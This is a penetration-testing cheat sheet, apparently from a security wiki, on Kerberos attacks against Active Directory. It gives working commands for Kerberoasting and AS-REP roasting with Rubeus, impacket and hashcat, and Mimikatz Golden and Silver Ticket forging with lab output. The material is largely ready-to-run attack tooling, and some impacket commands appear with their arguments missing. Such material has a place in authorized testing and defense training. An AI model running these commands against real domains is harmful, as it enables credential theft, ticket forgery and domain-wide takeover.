# Kerberos Attacks ## Relationships and Attack paths We can use [bloodhound ](https://infra.newerasec.com/infrastructure-testing/tools/bloodhound)to find hidden relationships and attack paths in an Active Directory environment. From the data collect we can escalate our privilege to the target, or use tools like [aclpwn](https://infra.newerasec.com/infrastructure-testing/tools/bloodhound/aclpwn). ## Kerberoasting The [AD Powershell ](https://github.com/samratashok/ADModule)module can be used to search for users with SPN | `Import-Module .\Microsoft.ActiveDirectory.Management.dll -Verbose` `Get-ADUser -LdapFilter "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"` `\| Format-Table Name, DistinguishedNam` | | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | Using Nmap: `nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'` Using Rubeus to gain hashes: `Rubeus.exe kerberoast /outfile:hashes.txt` Use the hashcat -m 13100 (Kerberos 5 TGS-REP etype 23) to crack: `hashcat -a 0` `-m 13100` `SPN.hash /wordlists/rockyou.txt` Using impacket: ``` python GetUserSPNs.py /: -outputfile ``` ## AS-RES Find users with pre-auth enabled using the [AD Powershell ](https://github.com/samratashok/ADModule)module : ``` Import-Module .\Microsoft.ActiveDirectory.Management.dll -Verbose Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name ``` To exploit run: ``` .\Rubeus.exe asreproast ``` Impacket: ``` # check ASREPRoast for all domain users (credentials required) python GetNPUsers.py /: -request -format -outputfile # check ASREPRoast for a list of users (no credentials required) python GetNPUsers.py / -usersfile -format -outputfile ``` ## Golden Ticket Once you gained the krbtgt hash (from dcsync or DC compromise)T The Mimikatz kerberos::golden module handles Golden Tickets We need the following parameters: * /domain - name of the domain * /sid - the sid of the domain (can be obtain from 'whoami /user' , remember to remove the RID) * /rc4 - the NTLM hash of krbtgt * /user - the user you want to create the new TGT ticket for * /id - the RIF of that user you looking to create ticket for * /ptt - (Optional) inject the new ticket into the current session, if not applied the ticket will be saved to a file ``` mimikatz # kerberos::golden /domain:eth.lab /sid:S-1-5-21-98033113-2199257571-2188946577 /rc4:88a4507aae31297a2df7921b1430d781 /user:Administrator /id:500 /ptt User : Administrator Domain : eth.lab (ETH) SID : S-1-5-21-98033113-2199257571-2188946577 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: 88a4507aae31297a2df7921b1430d781 - rc4_hmac_nt Lifetime : 06/04/2020 14:05:45 ; 04/04/2030 14:05:45 ; 04/04/2030 14:05:45 -> Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Golden ticket for 'Administrator @ eth.lab' successfully submitted for current session ``` ## Silver Ticket use the 'kerberos::golden' module to forge TGS, we will need to pass the following parameters: * /domain: The FDQN * /sid: The SID (Security Identifier) of the Domain (whoami /user) * /user: Target Account/Computer to Impersonate * /id: RID of the account you will be impersonating * /ptt: Optional ( will automatically inject the ticket into the current session) * /rc4: NTLM Hash of User Password/Computer Password * /service: the service we want to access **Example:** ``` mimikatz # kerberos::golden /sid:S-1-5-21-98033113-2199257571-2188946577-500 /domain:eth.lab /ptt /id:500 /target:WIN-EU4DLP9KRRC.eth.lab /service:cifs /rc4:0c0d4252608be9131c2826a6feaf94b8 /user:Administrator User : Administrator Domain : eth.lab (ETH) SID : S-1-5-21-98033113-2199257571-2188946577-500 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: 0c0d4252608be9131c2826a6feaf94b8 - rc4_hmac_nt Service : cifs Target : WIN-EU4DLP9KRRC.eth.lab Lifetime : 03/04/2020 17:00:01 ; 01/04/2030 17:00:01 ; 01/04/2030 17:00:01 -> Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Golden ticket for 'Administrator @ eth.lab' successfully submitted for current session ```